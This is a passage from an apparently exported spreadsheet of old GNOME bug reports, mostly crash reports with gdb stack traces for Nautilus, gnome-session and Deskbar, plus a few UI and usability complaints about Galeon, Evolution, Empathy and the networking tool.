   from /opt/STools/gnome-2.10/lib/librsvg-2.so.2
#10 0xb7e4d491 in rsvg_defs_drawable_group_draw ()
   from /opt/STools/gnome-2.10/lib/librsvg-2.so.2
#11 0xb7e4d365 in rsvg_defs_drawable_draw ()
   from /opt/STools/gnome-2.10/lib/librsvg-2.so.2
#12 0xb7e4d4de in rsvg_defs_drawable_group_draw ()
   from /opt/STools/gnome-2.10/lib/librsvg-2.so.2
#13 0xb7e4d365 in rsvg_defs_drawable_draw ()
   from /opt/STools/gnome-2.10/lib/librsvg-2.so.2
#14 0xb7e4d4de in rsvg_defs_drawable_group_draw ()
   from /opt/STools/gnome-2.10/lib/librsvg-2.so.2
#15 0xb7e4d365 in rsvg_defs_drawable_draw ()
   from /opt/STools/gnome-2.10/lib/librsvg-2.so.2
#16 0xb7e5429c in rsvg_defs_drawable_svg_draw ()
   from /opt/STools/gnome-2.10/lib/librsvg-2.so.2
#17 0xb7e4d365 in rsvg_defs_drawable_draw ()
   from /opt/STools/gnome-2.10/lib/librsvg-2.so.2
#18 0xb7e4d4de in rsvg_defs_drawable_group_draw ()
   from /opt/STools/gnome-2.10/lib/librsvg-2.so.2
#19 0xb7e4d365 in rsvg_defs_drawable_draw ()
   from /opt/STools/gnome-2.10/lib/librsvg-2.so.2
#20 0xb7e5f86c in rsvg_handle_get_pixbuf ()
   from /opt/STools/gnome-2.10/lib/librsvg-2.so.2
#21 0xb5f74ca8 in gdk_pixbuf__svg_image_stop_load ()
   from /opt/STools/gnome-2.10/lib/gtk-2.0/2.4.0/loaders/svg_loader.so
#22 0xb78bc5b8 in _gdk_pixbuf_generic_image_load (module=0x8102190 
    f=0x854ba48 error=0x0) at gdk-pixbuf-io.c:799
#23 0xb78bc6b8 in IA__gdk_pixbuf_new_from_file (
    filename=0x858d510 /home/olelain/tmp/japan.svg error=0x0)
    at gdk-pixbuf-io.c:890
#24 0xb7d829d0 in gnome_gdk_pixbuf_new_from_uri ()
   from /opt/STools/gnome-2.10/lib/libgnomeui-2.so.0
#25 0xb7d71336 in gnome_thumbnail_factory_generate_thumbnail ()
   from /opt/STools/gnome-2.10/lib/libgnomeui-2.so.0
#26 0xb7f951d3 in thumbnail_thread_start ()
   from /opt/STools/gnome-2.10/lib/libnautilus-private.so.2
#27 0x003e1341 in start_thread () from /lib/tls/libpthread.so.0
#28 0x001e1fee in clone () from /lib/tls/libc.so.6
Thread 11 (process 5370):
#0  0x001017a2 in _dl_sysinfo_int80 () from /lib/ld-linux.so.2
#1  0x003e3a86 in pthread_cond_wait@@GLIBC_2.3.2 ()
   from /lib/tls/libpthread.so.0
#2  0xb77c5546 in thread_entry (cast_to_state=0x81811b0)
    at gnome-vfs-thread-pool.c:156
#3  0xb7520fb4 in g_thread_create_proxy (data=0x8181228) at gthread.c:564
#4  0x003e1341 in start_thread () from /lib/tls/libpthread.so.0
#5  0x001e1fee in clone () from /lib/tls/libc.so.6
Thread 10 (process 5369):
#0  0x001017a2 in _dl_sysinfo_int80 () from /lib/ld-linux.so.2
#1  0x003e3a86 in pthread_cond_wait@@GLIBC_2.3.2 ()
   from /lib/tls/libpthread.so.0
#2  0xb77c5546 in thread_entry (cast_to_state=0x8180ec0)
    at gnome-vfs-thread-pool.c:156
#3  0xb7520fb4 in g_thread_create_proxy (data=0x8180f38) at gthread.c:564
#4  0x003e1341 in start_thread () from /lib/tls/libpthread.so.0
#5  0x001e1fee in clone () from /lib/tls/libc.so.6
Thread 9 (process 5368):
#0  0x001017a2 in _dl_sysinfo_int80 () from /lib/ld-linux.so.2
#1  0x003e3a86 in pthread_cond_wait@@GLIBC_2.3.2 ()
   from /lib/tls/libpthread.so.0
#2  0xb77c5546 in thread_entry (cast_to_state=0x8180bd0)
    at gnome-vfs-thread-pool.c:156
#3  0xb7520fb4 in g_thread_create_proxy (data=0x8180c48) at gthread.c:564
#4  0x003e1341 in start_thread () from /lib/tls/libpthread.so.0
#5  0x001e1fee in clone () from /lib/tls/libc.so.6
Thread 8 (process 5367):
#0  0x001017a2 in _dl_sysinfo_int80 () from /lib/ld-linux.so.2
#1  0x003e3a86 in pthread_cond_wait@@GLIBC_2.3.2 ()
   from /lib/tls/libpthread.so.0
#2  0xb77c5546 in thread_entry (cast_to_state=0x81808d8)
    at gnome-vfs-thread-pool.c:156
#3  0xb7520fb4 in g_thread_create_proxy (data=0x8180950) at gthread.c:564
#4  0x003e1341 in start_thread () from /lib/tls/libpthread.so.0
#5  0x001e1fee in clone () from /lib/tls/libc.so.6
Thread 7 (process 5366):
#0  0x001017a2 in _dl_sysinfo_int80 () from /lib/ld-linux.so.2
#1  0x003e3a86 in pthread_cond_wait@@GLIBC_2.3.2 ()
   from /lib/tls/libpthread.so.0
#2  0xb77c5546 in thread_entry (cast_to_state=0x81805e8)
    at gnome-vfs-thread-pool.c:156
#3  0xb7520fb4 in g_thread_create_proxy (data=0x8180660) at gthread.c:564
#4  0x003e1341 in start_thread () from /lib/tls/libpthread.so.0
#5  0x001e1fee in clone () from /lib/tls/libc.so.6
Thread 6 (process 5365):
#0  0x001017a2 in _dl_sysinfo_int80 () from /lib/ld-linux.so.2
#1  0x003e3a86 in pthread_cond_wait@@GLIBC_2.3.2 ()
   from /lib/tls/libpthread.so.0
#2  0xb77c5546 in thread_entry (cast_to_state=0x81802e8)
    at gnome-vfs-thread-pool.c:156
#3  0xb7520fb4 in g_thread_create_proxy (data=0x8180360) at gthread.c:564
#4  0x003e1341 in start_thread () from /lib/tls/libpthread.so.0
#5  0x001e1fee in clone () from /lib/tls/libc.so.6
Thread 5 (process 5364):
#0  0x001017a2 in _dl_sysinfo_int80 () from /lib/ld-linux.so.2
#1  0x003e3a86 in pthread_cond_wait@@GLIBC_2.3.2 ()
   from /lib/tls/libpthread.so.0
#2  0xb77c5546 in thread_entry (cast_to_state=0x817fff0)
    at gnome-vfs-thread-pool.c:156
#3  0xb7520fb4 in g_thread_create_proxy (data=0x8180068) at gthread.c:564
#4  0x003e1341 in start_thread () from /lib/tls/libpthread.so.0
#5  0x001e1fee in clone () from /lib/tls/libc.so.6
Thread 4 (process 5363):
#0  0x001017a2 in _dl_sysinfo_int80 () from /lib/ld-linux.so.2
#1  0x003e3a86 in pthread_cond_wait@@GLIBC_2.3.2 ()
   from /lib/tls/libpthread.so.0
#2  0xb77c5546 in thread_entry (cast_to_state=0x817fcf0)
    at gnome-vfs-thread-pool.c:156
#3  0xb7520fb4 in g_thread_create_proxy (data=0x817fd68) at gthread.c:564
#4  0x003e1341 in start_thread () from /lib/tls/libpthread.so.0
#5  0x001e1fee in clone () from /lib/tls/libc.so.6
Thread 3 (process 5362):
#0  0x001017a2 in _dl_sysinfo_int80 () from /lib/ld-linux.so.2
#1  0x003e3a86 in pthread_cond_wait@@GLIBC_2.3.2 ()
   from /lib/tls/libpthread.so.0
#2  0xb77c5546 in thread_entry (cast_to_state=0x817f9f8)
    at gnome-vfs-thread-pool.c:156
#3  0xb7520fb4 in g_thread_create_proxy (data=0x817fa70) at gthread.c:564
#4  0x003e1341 in start_thread () from /lib/tls/libpthread.so.0
#5  0x001e1fee in clone () from /lib/tls/libc.so.6
Thread 2 (process 5361):
#0  0x001017a2 in _dl_sysinfo_int80 () from /lib/ld-linux.so.2
#1  0x003e3a86 in pthread_cond_wait@@GLIBC_2.3.2 ()
   from /lib/tls/libpthread.so.0
#2  0xb77c5546 in thread_entry (cast_to_state=0x817f700)
    at gnome-vfs-thread-pool.c:156
#3  0xb7520fb4 in g_thread_create_proxy (data=0x817f778) at gthread.c:564
#4  0x003e1341 in start_thread () from /lib/tls/libpthread.so.0
#5  0x001e1fee in clone () from /lib/tls/libc.so.6
Thread 1 (process 5360):
#0  0x001017a2 in _dl_sysinfo_int80 () from /lib/ld-linux.so.2
#1  0x001d8404 in poll () from /lib/tls/libc.so.6
#2  0xb7507868 in g_main_context_iterate (context=0x816b280 block=1 
    dispatch=1 self=0x80f8410) at gmain.c:2867
#3  0xb7507be5 in IA__g_main_loop_run (loop=0x816abe0) at gmain.c:2769
#4  0xb75d39d1 in link_io_thread_fn ()
   from /opt/STools/gnome-2.10/lib/libORBit-2.so.0
#5  0xb7520fb4 in g_thread_create_proxy (data=0x80f8410) at gthread.c:564
#6  0x003e1341 in start_thread () from /lib/tls/libpthread.so.0
#7  0x001e1fee in clone () from /lib/tls/libc.so.6
Other information:
I don't know if it's reproducible (even  solved) in 2.12.</t>
  </si>
  <si>
    <t>olivier.lelain</t>
  </si>
  <si>
    <t>NAUTILUS-509821</t>
  </si>
  <si>
    <t>Close Parent Folders -&gt; nautilus crashes</t>
  </si>
  <si>
    <t>Steps to reproduce:
1. open folder
2. click file menu
3. click close paren folders menu
Stack trace:
(gdb) bt
#0  0x00130402 in __kernel_vsyscall ()
#1  0x01083f43 in __lll_lock_wait_private () from /lib/libc.so.6
#2  0x0100f968 in _L_lock_43 () from /lib/libc.so.6
#3  0x01008e7b in ptmalloc_lock_all () from /lib/libc.so.6
#4  0x0103591f in fork () from /lib/libc.so.6
#5  0x00f930c4 in fork () from /lib/libpthread.so.0
#6  0x00d0f689 in fork_exec_with_pipes (intermediate_child=0 
    working_directory=0x0 argv=0xb6f5b4c0 envp=0x0 close_descriptors=1 
    search_path=1 stdout_to_null=0 stderr_to_null=0 child_inherits_stdin=0 
    file_and_argv_zero=0 child_setup=0 user_data=0x0 child_pid=0x8bd80f0 
    standard_input=0x0 standard_output=0x0 standard_error=0x0 
    error=0x8bd8188) at gspawn.c:1177
#7  0x00d1025b in IA__g_spawn_sync (working_directory=0x0 argv=0x80 
    envp=0x0 flags=G_SPAWN_LEAVE_DESCRIPTORS_OPEN child_setup=0 
    user_data=0x0 standard_output=0x0 standard_error=0x0 exit_status=0x0 
    error=0x8bd8188) at gspawn.c:259
#8  0x00d106dc in IA__g_spawn_command_line_sync (
    command_line=0xb6f2a918 bug-buddy --appname=\nautilus\ --pid=7322 
    standard_output=0x0 standard_error=0x0 exit_status=0x0 error=0x8bd8188)
    at gspawn.c:682
#9  0x03a22350 in run_bug_buddy (appname=0x8bb4810 nautilus 
    pid= minidump_path=)
    at gnome-breakpad.cc:213
---Type  to continue or q  to quit---
#10 0x03a22659 in check_if_gdb (callback_context=0x0) at gnome-breakpad.cc:283
#11 0x03a22b73 in google_breakpad::ExceptionHandler::InternalWriteMinidump (
    this=0x3a2c9e0 signo=6 sighandler_ebp=146642456 sig_ctx=0x8bd9604)
    at ../google-breakpad/src/client/linux/handler/exception_handler.cc:225
#12 0x03a2308e in google_breakpad::ExceptionHandler::HandleException (signo=6)
    at ../google-breakpad/src/client/linux/handler/exception_handler.cc:196
#13 
#14 0x00130402 in __kernel_vsyscall ()
#15 0x00fc8810 in raise () from /lib/libc.so.6
#16 0x00fca111 in abort () from /lib/libc.so.6
#17 0x0100369b in __libc_message () from /lib/libc.so.6
#18 0x0100b906 in _int_free () from /lib/libc.so.6
#19 0x0100f070 in free () from /lib/libc.so.6
#20 0x00ce19d1 in IA__g_free (mem=0x8c86dc0) at gmem.c:187
#21 0x080687c8 in find_parent_spatial_window (window=)
    at nautilus-application.c:900
#22 0x08068905 in nautilus_application_close_parent_windows (window=0x8ce2040)
    at nautilus-application.c:942
#23 0x00c70a69 in IA__g_cclosure_marshal_VOID__VOID (closure=0x8cd2300 
    return_value=0x0 n_param_values=1 param_values=0xbfeb1cec 
    invocation_hint=0xbfeb1bcc marshal_data=0x8091aa0) at gmarshal.c:77
#24 0x00c63003 in IA__g_closure_invoke (closure=0x8cd2300 return_value=0x0 
    n_param_values=1 param_values=0xbfeb1cec invocation_hint=0xbfeb1bcc)
---Type  to continue or q  to quit---
    at gclosure.c:490
#25 0x00c7490b in signal_emit_unlocked_R (node=0x8c5e160 detail=0 
    instance=0x8ce31b0 emission_return=0x0 instance_and_params=0xbfeb1cec)
    at gsignal.c:2440
#26 0x00c75da3 in IA__g_signal_emit_valist (instance=0x8ce31b0 signal_id=161 
    detail=0 var_args=0x1 ) at gsignal.c:2199
#27 0x00c76049 in IA__g_signal_emit (instance=0x8ce31b0 signal_id=161 
    detail=0) at gsignal.c:2243
#28 0x0067d8f6 in _gtk_action_emit_activate (action=0x8ce31b0)
    at gtkaction.c:872
#29 0x0067d9bd in IA__gtk_action_activate (action=0x8ce31b0) at gtkaction.c:899
#30 0x00c70a69 in IA__g_cclosure_marshal_VOID__VOID (closure=0x8e0bec8 
    return_value=0x0 n_param_values=1 param_values=0xbfeb21ec 
    invocation_hint=0xbfeb20cc marshal_data=0x67d91f) at gmarshal.c:77
#31 0x00c63003 in IA__g_closure_invoke (closure=0x8e0bec8 return_value=0x0 
    n_param_values=1 param_values=0xbfeb21ec invocation_hint=0xbfeb20cc)
    at gclosure.c:490
#32 0x00c7490b in signal_emit_unlocked_R (node=0x8c68110 detail=0 
    instance=0x8e0ab60 emission_return=0x0 instance_and_params=0xbfeb21ec)
    at gsignal.c:2440
#33 0x00c75da3 in IA__g_signal_emit_valist (instance=0x8e0ab60 signal_id=186 
    detail=0 var_args=0xb6f4fd18 \001) at gsignal.c:2199
#34 0x00c76049 in IA__g_signal_emit (instance=0x8e0ab60 signal_id=186 
---Type  to continue or q  to quit---
    detail=0) at gsignal.c:2243
#35 0x00911b25 in IA__gtk_widget_activate (widget=0x8e0ab60)
    at gtkwidget.c:4706
#36 0x007b65d1 in IA__gtk_menu_shell_activate_item (menu_shell=0x8cb2520 
    menu_item=0x8e0ab60 force_deactivate=1) at gtkmenushell.c:1145
#37 0x007b5306 in gtk_menu_shell_button_release (widget=0x8cb2520 
    event=0x8e4a8f8) at gtkmenushell.c:669
#38 0x007aa0ba in gtk_menu_button_release (widget=0x8cb2520 event=0x8e4a8f8)
    at gtkmenu.c:2725
#39 0x0079fb36 in _gtk_marshal_BOOLEAN__BOXED (closure=0x8c42b10 
    return_value=0xbfeb2710 n_param_values=2 param_values=0xbfeb281c 
    invocation_hint=0xbfeb26fc marshal_data=0x7a9f8b) at gtkmarshalers.c:84
#40 0x00c617f9 in g_type_class_meta_marshal (closure=0x8c42b10 
    return_value=0xbfeb2710 n_param_values=2 param_values=0xbfeb281c 
    invocation_hint=0xbfeb26fc marshal_data=0xb4) at gclosure.c:567
#41 0x00c63003 in IA__g_closure_invoke (closure=0x8c42b10 
    return_value=0xbfeb2710 n_param_values=2 param_values=0xbfeb281c 
    invocation_hint=0xbfeb26fc) at gclosure.c:490
#42 0x00c74f51 in signal_emit_unlocked_R (node=0x8c42bc8 detail=0 
    instance=0x8cb2520 emission_return=0xbfeb29dc 
    instance_and_params=0xbfeb281c) at gsignal.c:2478
#43 0x00c75c56 in IA__g_signal_emit_valist (instance=0x8cb2520 signal_id=89 
    detail=0 var_args=0xbfeb2a60 |*ï¿½ï¿½\b) at gsignal.c:2209
---Type  to continue or q  to quit---
#44 0x00c76049 in IA__g_signal_emit (instance=0x8cb2520 signal_id=89 
    detail=0) at gsignal.c:2243
#45 0x00911a11 in gtk_widget_event_internal (widget=0x8cb2520 event=0x8e4a8f8)
    at gtkwidget.c:4675
#46 0x00911537 in IA__gtk_widget_event (widget=0x8cb2520 event=0x8e4a8f8)
    at gtkwidget.c:4475
#47 0x0079e0f5 in IA__gtk_propagate_event (widget=0x8cb2520 event=0x8e4a8f8)
    at gtkmain.c:2336
#48 0x0079cbdf in IA__gtk_main_do_event (event=0x8e4a8f8) at gtkmain.c:1556
#49 0x00a74eb8 in gdk_event_dispatch (source=0x8bd8978 callback=0 
    user_data=0x0) at gdkevents-x11.c:2351
#50 0x00cd9bbc in IA__g_main_context_dispatch (context=0x8bd89c0)
    at gmain.c:2064
#51 0x00cdd036 in g_main_context_iterate (context=0x8bd89c0 block=1 
    dispatch=1 self=0x8ba63f0) at gmain.c:2697
#52 0x00cdd3e9 in IA__g_main_loop_run (loop=0x8c3fc90) at gmain.c:2905
#53 0x0079c307 in IA__gtk_main () at gtkmain.c:1163
#54 0x08078b6f in main (argc=Cannot access memory at address 0x1c9a
) at nautilus-main.c:568
#55 0x00fb44a0 in __libc_start_main () from /lib/libc.so.6
#56 0x080668c1 in _start ()
Other information:
OS : Fedora development (rawhide 20080116)
nautilus-2.21.5-1.fc9
gvfs-0.1.2-1.fc9
glib2-2.15.2-1.fc9
gtk2-2.12.5-1.fc9
pango-1.19.2-1.fc9</t>
  </si>
  <si>
    <t>GALEON-84201</t>
  </si>
  <si>
    <t>Security warning dialog button ordering</t>
  </si>
  <si>
    <t>in the sercurity warning dialog continue is the affirmative action so it
should be on the right...eg [cancel][continue]</t>
  </si>
  <si>
    <t>GNOME-SESSION-119346</t>
  </si>
  <si>
    <t>gnome-session loses X11 connection and crashes when logout.</t>
  </si>
  <si>
    <t>During logout (after selecting Logout Shutdown or Reboot)
gnome-session crashes (it loses X11 connection resulting in  error
message). This causes shutdown or reboot order to be lost in space since
crash occurs before exec is done on poweroff/reboot.
After regression testing it appears the crash is caused by changes in
splash-widget.c from Havoc :
2003-06-23  Havoc Pennington  
        * splash-widget.c (splash_start): use
        GDK_WINDOW_TYPE_HINT_SPLASHSCREEN instead of being override
        redirect.
--- splash-widget.c     2 Apr 2003 07:58:33 -0000       1.7
+++ splash-widget.c     24 Jun 2003 18:47:06 -0000      1.8
@@ -5427 +54210 @@
                return
        global_splash = g_object_new (SPLASH_TYPE_WIDGET
-                                     type GTK_WINDOW_POPUP NULL)
+                                      type_hint
+                                      GDK_WINDOW_TYPE_HINT_SPLASHSCREEN
+                                      NULL)
+        gtk_window_set_decorated (GTK_WINDOW (global_splash) FALSE)
        gtk_widget_show_now (GTK_WIDGET (global_splash))
 }
If I revert this change (the set_decorated call is not causing the
crash..) everything is back to normal.</t>
  </si>
  <si>
    <t>NAUTILUS-74374</t>
  </si>
  <si>
    <t>Natulis desktop crash when starting Gnome-desktop (startx from a shell)</t>
  </si>
  <si>
    <t xml:space="preserve">Package: nautilus
Severity: blocker
Version: 1.1.8
Synopsis: Natulis desktop crash when starting Gnome-desktop (startx from a shell)
Bugzilla-Product: nautilus
Bugzilla-Component: general
BugBuddy-GnomeVersion: 2.0 (1.112.1)
Description:
Description of Problem:
Natilus doesn't start when starting the Gnome 2 desktop. It crashes and
10-15 program crash windows come up.
I am running RedHat 7.2 with the latest updates from Red-Carpet.
Steps to reproduce the problem:
1.  Install Gnome 2 desktop from Ximian Red-Carpet
2.  run startx from a shell.
3.  Watch how Gnome is starting and natilus crashes after a few
seconds..
Actual Results:
Expected Results:
How often does this happen?
Everytime. It seems to be possible (sometimes) to start nautilus from a
X-server without gnome (from an xterm).
Additional Information:
Debugging Information:
[New Thread 1024 (LWP 4257)]
0x40959ca9 in __wait4 () from /lib/i686/libc.so.6
#0  0x40959ca9 in __wait4 () from /lib/i686/libc.so.6
#1  0x409d56b4 in __DTOR_END__ () from /lib/i686/libc.so.6
#2  0x407966f3 in waitpid (pid=4799 stat_loc=0xbfffe22c options=0) at
wrapsyscall.c:172
#3  0x4019afe9 in libgnomeui_segv_handle (signum=5) at
gnome-ui-init.c:598
#4  0x40794a85 in pthread_sighandler (signo=5 ctx=
      {gs = 7 __gsh = 0 fs = 0 __fsh = 0 es = 43 __esh = 0 ds =
43 __dsh = 0 edi = 1 esi = 0 ebp = 3221219864 esp = 3221218768 ebx
= 1082392472 edx = 0 ecx = 0 eax = 13 trapno = 3 err = 0 eip =
1082152506 cs = 35 __csh = 0 eflags = 582 esp_at_signal =
3221218768 ss = 43 __ssh = 0 fpstate = 0xbfffe350 oldmask =
2147483648 cr2 = 0}) at signals.c:97
#5  
#6  0x4080563a in g_logv (log_domain=0x0 log_level=G_LOG_LEVEL_ERROR 
    format=0x400be540 Failed to activate the server %s this may
indicate a broken\nNautilus or Bonobo installation or may reflect a bug
in something\nor may mean that your PATH or LD_LIBRARY_PATH or the like
is\nincorrect.... args1=0xbfffea4c)
    at gmessages.c:551
#7  0x408056e3 in g_log (log_domain=0x0 log_level=G_LOG_LEVEL_ERROR 
    format=0x400be540 Failed to activate the server %s this may
indicate a broken\nNautilus or Bonobo installation or may reflect a bug
in something\nor may mean that your PATH or LD_LIBRARY_PATH or the like
is\nincorrect....) at gmessages.c:574
#8  0x40073dab in die_on_failed_activation (server_name=0x400be3e6
Nautilus_MetafileFactory ev=0xbfffea90)
    at nautilus-directory-metafile.c:90
#9  0x40073e24 in get_factory () at nautilus-directory-metafile.c:108
#10 0x40073ebb in open_metafile (uri=0x81d37c0
file:///home/kadzuki/.gnome-desktop make_errors_fatal=0)
    at nautilus-directory-metafile.c:131
#11 0x40073f5b in get_metafile (directory=0x81d32f0) at
nautilus-directory-metafile.c:155
#12 0x40074cb4 in nautilus_directory_register_metadata_monitor
(directory=0x81d32f0) at nautilus-directory-metafile.c:528
#13 0x4006f299 in nautilus_directory_call_when_ready_internal
(directory=0x81d32f0 file=0x81d3480 file_attributes=0x81c9ad0 
    wait_for_file_list=0 directory_callback=0 file_callback=0x805e89c
 callback_data=0x81d3188)
    at nautilus-directory-async.c:1279
#14 0x400b0c79 in vfs_file_call_when_ready (file=0x81d3480
file_attributes=0x81c9ad0 
    callback=0x805e89c 
callback_data=0x81d3188) at nautilus-vfs-file.c:70
#15 0x40087e30 in nautilus_file_call_when_ready (file=0x81d3480
file_attributes=0x81c9ad0 
    callback=0x805e89c 
callback_data=0x81d3188) at nautilus-file.c:4737
#16 0x0805ea44 in nautilus_determine_initial_view (location=0x81d1158
file:///home/kadzuki/.gnome-desktop 
    callback=0x8079e5c 
callback_data=0x8112c98) at nautilus-applicable-views.c:159
#17 0x0807a4c0 in begin_location_change (window=0x8112c98
location=0x81d1158 file:///home/kadzuki/.gnome-desktop 
    type=NAUTILUS_LOCATION_CHANGE_STANDARD distance=0) at
nautilus-window-manage-views.c:1456
#18 0x08079441 in nautilus_window_open_location (window=0x8112c98
location=0x81d1158 file:///home/kadzuki/.gnome-desktop)
    at nautilus-window-manage-views.c:741
#19 0x08063a7f in nautilus_desktop_window_update_directory
(window=0x8112c98) at nautilus-desktop-window.c:94
#20 0x08063b35 in nautilus_desktop_window_new (application=0x80d5ca8) at
nautilus-desktop-window.c:118
#21 0x0805f671 in nautilus_application_create_desktop_window
(application=0x80d5ca8) at nautilus-application.c:582
#22 0x0805e42f in _ORBIT_skel_small_Nautilus_Shell_start_desktop
(_o_servant=0x80fabdc _o_retval=0x0 _o_args=0x0 
    _o_ctx=0xbfffee30 _o_ev=0xbfffef00 _impl_start_desktop=0x806c154
)
    at nautilus-shell-interface-skels.c:58
#23 0x4076e398 in ORBit_POAObject_invoke (pobj=0x80fac20 ret=0x0
args=0x0 ctx=0xbfffee30 data=0xbfffeea0 ev=0xbfffef00)
    at poa.c:891
#24 0x407710d3 in ORBit_OAObject_invoke (adaptor_obj=0x80fac20 ret=0x0
args=0x0 ctx=0xbfffee30 data=0xbfffeea0 
    ev=0xbfffef00) at orbit-adaptor.c:116
#25 0x4076206e in ORBit_small_invoke_adaptor (adaptor_obj=0x80fac20
recv_buffer=0x812afd8 m_data=0x80b0380 data=0xbfffeea0 
    ev=0xbfffef00) at orbit-small.c:772
#26 0x4076e853 in ORBit_POAObject_handle_request (pobj=0x80fac20
opname=0x80d6640 start_desktop ret=0x0 args=0x0 
    ctx=0x0 recv_buffer=0x812afd8 ev=0xbfffef00) at poa.c:1085
#27 0x4076ea86 in ORBit_POA_handle_request (poa=0x80cadb8
recv_buffer=0x812afd8 objkey=0x812aff0) at poa.c:1172
#28 0x4077105e in ORBit_handle_request (orb=0x80cad20
recv_buffer=0x812afd8) at orbit-adaptor.c:79
#29 0x4075d892 in giop_connection_handle_input (lcnx=0x812b480) at
giop-recv-buffer.c:945
#30 0x4086849b in linc_connection_io_handler (gioc=0x0
condition=G_IO_IN data=0x812b480) at linc-connection.c:840
#31 0x40869cc4 in linc_source_dispatch (source=0x812af20
callback=0x40868430  
    user_data=0x812b480) at linc-source.c:56
#32 0x407fe632 in g_main_dispatch (context=0x80caa90) at gmain.c:1617
#33 0x407ff449 in g_main_context_dispatch (context=0x80caa90) at
gmain.c:2161
#34 0x407ff7dc in g_main_context_iterate (context=0x80caa90 block=1
dispatch=1 self=0x80b9708) at gmain.c:2242
#35 0x407ff953 in g_main_context_iteration (context=0x80caa90
may_block=1) at gmain.c:2301
#36 0x40867520 in linc_main_iteration (block_for_reply=1) at linc.c:125
#37 0x4075d209 in giop_recv_buffer_get (ent=0xbffff1d0
block_for_reply=1) at giop-recv-buffer.c:667
#38 0x4076123f in orbit_small_demarshal (obj=0x80d1018 cnx=0xbffff1cc
mqe=0xbffff1d0 ev=0xbffff2f0 ret=0xbffff238 
    m_data=0x4027c5a8 args=0xbffff260) at orbit-small.c:396
#39 0x40761a26 in ORBit_small_invoke_stub (obj=0x80d1018
m_data=0x4027c5a8 ret=0xbffff238 args=0xbffff260 ctx=0x0 
    ev=0xbffff2f0) at orbit-small.c:607
#40 0x4027388f in ConfigDatabase2_lookup_with_schema_name
(_obj=0x80d1018 
    key=0x80d64f8 /apps/nautilus/preferences/show_desktop
locale=0x80be508 en_US use_schema_default=1 '\001' 
    schema_name=0xbffff2dc value_is_default=0xbffff2e2 
value_is_writable=0xbffff2e3 \001\030P\f\bx
------- Bug moved to this database by unknown@bugzilla.gnome.org 2002-03-12 10:19 -------
Unknown version 1.1.x in product nautilus. Setting version to the default unspecified.
The original reporter (andewid@tnonline.net) of this bug does not have an account here.
Reassigning to the exporter unknown@bugzilla.gnome.org.
Reassigning to the default owner of the component nautilus-maint@bugzilla.gnome.org.
</t>
  </si>
  <si>
    <t>andewid</t>
  </si>
  <si>
    <t>DESKBAR-APPLET-356893</t>
  </si>
  <si>
    <t>crash in Deskbar: Gimp in die deskbar eing...</t>
  </si>
  <si>
    <t>What were you doing when the application crashed?
Gimp in die deskbar eingegeben und Enter gedrÃ¼ckt.
Distribution: Gentoo Base System version 1.12.5
Gnome Release: 2.16.0 2006-09-17 (Gentoo)
BugBuddy Version: 2.16.0
Memory status: size: 0 vsize: 0 resident: 0 share: 0 rss: 0 rss_rlim: 0
CPU usage: start_time: 0 rtime: 0 utime: 0 stime: 0 cutime:0 cstime: 0 timeout: 0 it_real_value: 0 frequency: 0
Traceback (most recent call last):
  File /usr/lib/python2.4/site-packages/deskbar/ui/cuemiac/LingeringSelectionWindow.py line 33 in _on_view_activated
    image.set_from_pixmap (pixmap None)
TypeError: GtkImage.set_from_pixmap() argument 1 must be gtk.gdk.Pixmap not None</t>
  </si>
  <si>
    <t>GNOME-SYSTEM-TOOLS-157641</t>
  </si>
  <si>
    <t>GNOME networking configuration tool doesn't accept # in phone numbers</t>
  </si>
  <si>
    <t>This bug has been reported here: https://bugzilla.ubuntu.com/3298
I was trying to configure my wireless internet (not wi-fi) which utilizes a
phone connected via USB.  The phone simulates a modem with AT commands and
everything.  In order to connect I have to dial the number #777 using my
software.  GNOME's Networking tool doesn't like this and the Next button is
grayed out in the network wizard as long as the number contains a #.  This can
be worked around by providing a different number and changing it in the
Networking control panel after the fact.</t>
  </si>
  <si>
    <t>JHBUILD-102390</t>
  </si>
  <si>
    <t>glimmer now depends upon libgnomeprintui-2.2 not 2.0</t>
  </si>
  <si>
    <t>EMPATHY-517699</t>
  </si>
  <si>
    <t>Latency between click on notification icon and message appearing</t>
  </si>
  <si>
    <t>Please describe the problem:
When a message comes in the notification icon is blinking.
When pressing it the message window opens but you have to wait a second before the last message shows up.
Steps to reproduce:
Actual results:
Expected results:
Does this happen every time?
Yes but I'm sure it didn't happen before (a few release before - I'm using latest  SVN trunk).
Other information:</t>
  </si>
  <si>
    <t>bdusauso</t>
  </si>
  <si>
    <t>GNOME-PANEL-117737</t>
  </si>
  <si>
    <t>show-desktop-button</t>
  </si>
  <si>
    <t>Show Desktop Button in odd place on menu</t>
  </si>
  <si>
    <t>Just thought that perhaps it may be better to move Show Desktop Button from
Add To Panel -&gt; Utilities -&gt; Show Desktop Button 
 into 
Add To Panel -&gt; Buttons -&gt; Show Desktop  
I also thought that it made sense to add it to the Actions menu on the Menu
Panel.. maybe.
Not sure how relevant these suggestions are to 2.3.x either.</t>
  </si>
  <si>
    <t>sutherla</t>
  </si>
  <si>
    <t>XCHAT-GNOME-518538</t>
  </si>
  <si>
    <t>Resize grip still present when window is maximized</t>
  </si>
  <si>
    <t>ssia.
Should not be there when the window is maximized but it is.
*resize grip is the dotted corner down to the right in the window used to resize it.</t>
  </si>
  <si>
    <t>NAUTILUS-45645</t>
  </si>
  <si>
    <t>Need framework for adding arbitrary widgets as preferences</t>
  </si>
  <si>
    <t xml:space="preserve">Currently the preferences dialog has a well-defined set of UI widgets that it
supports one widget per preference. The list is something like: radio buttons
checkbox option menu text field. Some preferences require more complicated
specialized UI such as the theme choice. To support these the preferences
mechanisms need to have some way to support arbitrary widgets for controlling
preferences.
------- Additional Comments From eli@eazel.com 2001-03-26 11:20:19 ----
SPAAAAAAAAAM! 
(Jon Allen has taken these components QA Assigning bugs to him.)
------- Additional Comments From ramiro@fateware.com 2001-04-26 16:10:42 ----
I just did this work.
------- Bug moved to this database by unknown@bugzilla.gnome.org 2001-09-09 20:51 -------
Bug blocks bug(s) 43418 43419.
</t>
  </si>
  <si>
    <t>EVOLUTION-319083</t>
  </si>
  <si>
    <t>Cannot assign assigned task to anyone but person sending assignment</t>
  </si>
  <si>
    <t>Please describe the problem:
I am unable to assign tasks due to the fact that add/remove buttons are grayed
out on the form even when I have several contacts to choose from.
The only person I can assign the task to is the sender account which is done
automatically.
Steps to reproduce:
1. Create new assigned task
2. Attempt to assign it
3. See that it cannot be done due to buttons being grayed out
Actual results:
Add button is grayed out
Expected results:
Add button should be available
Does this happen every time?
Yes.
Other information:</t>
  </si>
  <si>
    <t>DAMNED-LIES-460583</t>
  </si>
  <si>
